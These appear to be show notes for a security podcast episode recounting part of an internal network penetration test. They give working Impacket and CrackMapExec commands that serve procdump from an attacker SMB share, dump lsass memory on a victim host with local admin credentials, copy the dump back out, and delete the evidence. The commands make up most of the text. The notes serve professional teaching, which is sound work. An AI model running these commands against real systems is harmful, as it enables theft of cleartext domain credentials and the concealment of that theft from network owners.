7MS #383: Tales of Internal Network Pentest Pwnage - Part 10

SafePass.me is the only enterprise solution to protect organizations against credential stuffing and password spraying attacks. Visit safepass.me for more details, and tell them 7 Minute Security sent you to get a 10% discount!

This episode is a "sequel" of sorts to part 9 where I was helping another company tag-team an internal network pentest. (In announcer voice) "When we last left our heroes we had..."

  • Relayed one high-priv cred from one box to another
  • Dumped and cracked a local machine's hash
  • Passed that hash around the network
  • Found (via Bloodhound) some high value targets we wanted to grab domain admin creds from
  • Set the wdigest flag via CrackMapExec

Today, we talk about how we came back to the pentest a few days later and scripted the procdump/lsass operation to (hopefully) grab cleartext credentials from these high value targets. Here's how we did it:

First, setup a listening SMB server on your Kali box (in this case, 192.168.55.60):

mkdir /share
cd /share
wget https://live.sysinternals.com/procdump64.exe
screen -R smb
/opt/impacket/examples/smbserver.py -smb2support share /share

Then, we escaped the screen session and ran the following CME commands to copy procdump over to the victim machine, create the dump, take the dump, then delete procdump.exe and the residual dump file:

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "\\192.168.55.60\share\procdump64.exe" "c:\users\public\procdump64.exe"'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'c:\users\public\procdump64.exe -accepteula -ma lsass.exe c:\users\public\lsass.dmp'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'copy "c:\users\public\lsass.dmp" "\\192.168.55.60\share\"'

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'del "c:\users\public\lsass.dmp"

crackmapexec smb 192.168.55.220 -u Administrator -p 'Winter2018!' --local-auth --exec-method smbexec -x 'del "c:\users\public\procdump64.exe"

Did we get creds? Did we get DA? Listen to today's episode to find out!